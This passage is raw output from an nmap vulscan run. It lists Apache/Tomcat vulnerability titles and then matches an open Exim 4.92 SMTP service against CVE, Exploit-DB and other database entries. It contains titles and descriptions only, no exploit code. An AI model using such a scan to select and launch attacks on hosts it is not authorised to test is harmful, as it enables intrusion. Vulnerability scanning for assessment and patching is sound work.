16891| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
16892| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
16893| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
16894| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
16895| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
16896| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
16897| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
16898| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
16899| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
16900| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
16901| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
16902| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
16903| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
16904| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
16905| [32724] Apache mod_python _filter_read Freed Memory Disclosure
16906| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
16907| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
16908| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
16909| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
16910| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
16911| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
16912| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
16913| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
16914| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
16915| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
16916| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
16917| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
16918| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
16919| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
16920| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
16921| [24365] Apache Struts Multiple Function Error Message XSS
16922| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
16923| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
16924| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
16925| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
16926| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
16927| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
16928| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
16929| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
16930| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
16931| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
16932| [22459] Apache Geronimo Error Page XSS
16933| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
16934| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
16935| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
16936| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
16937| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
16938| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
16939| [21021] Apache Struts Error Message XSS
16940| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
16941| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
16942| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
16943| [20439] Apache Tomcat Directory Listing Saturation DoS
16944| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
16945| [20285] Apache HTTP Server Log File Control Character Injection
16946| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
16947| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
16948| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
16949| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
16950| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
16951| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
16952| [19821] Apache Tomcat Malformed Post Request Information Disclosure
16953| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
16954| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
16955| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
16956| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
16957| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
16958| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
16959| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
16960| [18233] Apache HTTP Server htdigest user Variable Overfow
16961| [17738] Apache HTTP Server HTTP Request Smuggling
16962| [16586] Apache HTTP Server Win32 GET Overflow DoS
16963| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
16964| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
16965| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
16966| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
16967| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
16968| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
16969| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
16970| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
16971| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
16972| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
16973| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
16974| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
16975| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
16976| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
16977| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
16978| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
16979| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
16980| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
16981| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
16982| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
16983| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
16984| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
16985| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
16986| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
16987| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
16988| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
16989| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
16990| [13304] Apache Tomcat realPath.jsp Path Disclosure
16991| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
16992| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
16993| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
16994| [12848] Apache HTTP Server htdigest realm Variable Overflow
16995| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
16996| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
16997| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
16998| [12557] Apache HTTP Server prefork MPM accept Error DoS
16999| [12233] Apache Tomcat MS-DOS Device Name Request DoS
17000| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
17001| [12231] Apache Tomcat web.xml Arbitrary File Access
17002| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
17003| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
17004| [12178] Apache Jakarta Lucene results.jsp XSS
17005| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
17006| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
17007| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
17008| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
17009| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
17010| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
17011| [10471] Apache Xerces-C++ XML Parser DoS
17012| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
17013| [10068] Apache HTTP Server htpasswd Local Overflow
17014| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
17015| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
17016| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
17017| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
17018| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
17019| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
17020| [9717] Apache HTTP Server mod_cookies Cookie Overflow
17021| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
17022| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
17023| [9714] Apache Authentication Module Threaded MPM DoS
17024| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
17025| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
17026| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
17027| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
17028| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
17029| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
17030| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
17031| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
17032| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
17033| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
17034| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
17035| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
17036| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
17037| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
17038| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
17039| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
17040| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
17041| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
17042| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
17043| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
17044| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
17045| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
17046| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
17047| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
17048| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
17049| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
17050| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
17051| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
17052| [9208] Apache Tomcat .jsp Encoded Newline XSS
17053| [9204] Apache Tomcat ROOT Application XSS
17054| [9203] Apache Tomcat examples Application XSS
17055| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
17056| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
17057| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
17058| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
17059| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
17060| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
17061| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
17062| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
17063| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
17064| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
17065| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
17066| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
17067| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
17068| [7611] Apache HTTP Server mod_alias Local Overflow
17069| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
17070| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
17071| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
17072| [6882] Apache mod_python Malformed Query String Variant DoS
17073| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
17074| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
17075| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
17076| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
17077| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
17078| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
17079| [5526] Apache Tomcat Long .JSP URI Path Disclosure
17080| [5278] Apache Tomcat web.xml Restriction Bypass
17081| [5051] Apache Tomcat Null Character DoS
17082| [4973] Apache Tomcat servlet Mapping XSS
17083| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
17084| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
17085| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
17086| [4568] mod_survey For Apache ENV Tags SQL Injection
17087| [4553] Apache HTTP Server ApacheBench Overflow DoS
17088| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
17089| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
17090| [4383] Apache HTTP Server Socket Race Condition DoS
17091| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
17092| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
17093| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
17094| [4231] Apache Cocoon Error Page Server Path Disclosure
17095| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
17096| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
17097| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
17098| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
17099| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
17100| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
17101| [3322] mod_php for Apache HTTP Server Process Hijack
17102| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
17103| [2885] Apache mod_python Malformed Query String DoS
17104| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
17105| [2733] Apache HTTP Server mod_rewrite Local Overflow
17106| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
17107| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
17108| [2149] Apache::Gallery Privilege Escalation
17109| [2107] Apache HTTP Server mod_ssl Host: Header XSS
17110| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
17111| [1833] Apache HTTP Server Multiple Slash GET Request DoS
17112| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
17113| [872] Apache Tomcat Multiple Default Accounts
17114| [862] Apache HTTP Server SSI Error Page XSS
17115| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
17116| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
17117| [845] Apache Tomcat MSDOS Device XSS
17118| [844] Apache Tomcat Java Servlet Error Page XSS
17119| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
17120| [838] Apache HTTP Server Chunked Encoding Remote Overflow
17121| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
17122| [775] Apache mod_python Module Importing Privilege Function Execution
17123| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
17124| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
17125| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
17126| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
17127| [637] Apache HTTP Server UserDir Directive Username Enumeration
17128| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
17129| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
17130| [562] Apache HTTP Server mod_info /server-info Information Disclosure
17131| [561] Apache Web Servers mod_status /server-status Information Disclosure
17132| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
17133| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
17134| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
17135| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
17136| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
17137| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
17138| [376] Apache Tomcat contextAdmin Arbitrary File Access
17139| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
17140| [222] Apache HTTP Server test-cgi Arbitrary File Access
17141| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
17142| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
17143|_
17144465/tcp open ssl/smtp Exim smtpd 4.92
17145| vulscan: VulDB - https://vuldb.com:
17146| [141327] Exim up to 4.92.1 Backslash privilege escalation
17147| [138827] Exim up to 4.92 Expansion Code Execution
17148| [135932] Exim up to 4.92 privilege escalation
17149| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
17150|
17151| MITRE CVE - https://cve.mitre.org:
17152| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
17153| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
17154| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
17155| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
17156| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
17157| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
17158| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
17159| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
17160| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
17161| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
17162| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
17163| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
17164| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
17165| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
17166| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
17167| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
17168|
17169| SecurityFocus - https://www.securityfocus.com/bid/:
17170| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
17171| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
17172| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
17173| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
17174| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
17175| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
17176| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17177| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
17178| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
17179| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
17180| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
17181| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
17182| [45308] Exim Crafted Header Remote Code Execution Vulnerability
17183| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
17184| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
17185| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
17186| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
17187| [17110] sa-exim Unauthorized File Access Vulnerability
17188| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
17189| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
17190| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
17191| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
17192| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
17193| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
17194| [6314] Exim Internet Mailer Format String Vulnerability
17195| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
17196| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
17197| [2828] Exim Format String Vulnerability
17198| [1859] Exim Buffer Overflow Vulnerability
17199|
17200| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17201| [84758] Exim sender_address parameter command execution
17202| [84015] Exim command execution
17203| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
17204| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
17205| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
17206| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
17207| [67455] Exim DKIM processing code execution
17208| [67299] Exim dkim_exim_verify_finish() format string
17209| [65028] Exim open_log privilege escalation
17210| [63967] Exim config file privilege escalation
17211| [63960] Exim header buffer overflow
17212| [59043] Exim mail directory privilege escalation
17213| [59042] Exim MBX symlink
17214| [52922] ikiwiki teximg plugin information disclosure
17215| [34265] Exim spamd buffer overflow
17216| [25286] Sa-exim greylistclean.cron file deletion
17217| [22687] RHSA-2005:025 updates for exim not installed
17218| [18901] Exim dns_build_reverse buffer overflow
17219| [18764] Exim spa_base64_to_bits function buffer overflow
17220| [18763] Exim host_aton buffer overflow
17221| [16079] Exim require_verify buffer overflow
17222| [16077] Exim header_check_syntax buffer overflow
17223| [16075] Exim sender_verify buffer overflow
17224| [13067] Exim HELO or EHLO command heap overflow
17225| [10761] Exim daemon.c format string
17226| [8194] Exim configuration file -c command-line argument buffer overflow
17227| [7738] Exim allows attacker to hide commands in localhost names using pipes
17228| [6671] Exim "
17229| [1893] Exim MTA allows local users to gain root privileges
17230|
17231| Exploit-DB - https://www.exploit-db.com:
17232| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
17233| [15725] Exim 4.63 Remote Root Exploit
17234| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
17235| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
17236| [796] Exim <= 4.42 Local Root Exploit
17237| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
17238|
17239| OpenVAS (Nessus) - http://www.openvas.org:
17240| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
17241|
17242| SecurityTracker - https://www.securitytracker.com:
17243| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
17244| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
17245| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
17246| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
17247| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
17248| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
17249| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
17250| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
17251| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
17252| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
17253| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
17254| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
17255|
17256| OSVDB - http://www.osvdb.org:
17257| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17258| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
17259| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
17260| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
17261| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
17262| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
17263| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
17264| [70696] Exim log.c open_log() Function Local Privilege Escalation
17265| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
17266| [69685] Exim string_format Function Remote Overflow
17267| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
17268| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
17269| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
17270| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
17271| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
17272| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
17273| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
17274| [12726] Exim -be Command Line Option host_aton Function Local Overflow
17275| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
17276| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
17277| [10032] libXpm CreateXImage Function Integer Overflow
17278| [7160] Exim .forward :include: Option Privilege Escalation
17279| [6479] Vexim COOKIE Authentication Credential Disclosure
17280| [6478] Vexim Multiple Parameter SQL Injection
17281| [5930] Exim Parenthesis File Name Filter Bypass
17282| [5897] Exim header_syntax Function Remote Overflow
17283| [5896] Exim sender_verify Function Remote Overflow
17284| [5530] Exim Localhost Name Arbitrary Command Execution
17285| [5330] Exim Configuration File Variable Overflow
17286| [1855] Exim Batched SMTP Mail Header Format String
17287|_
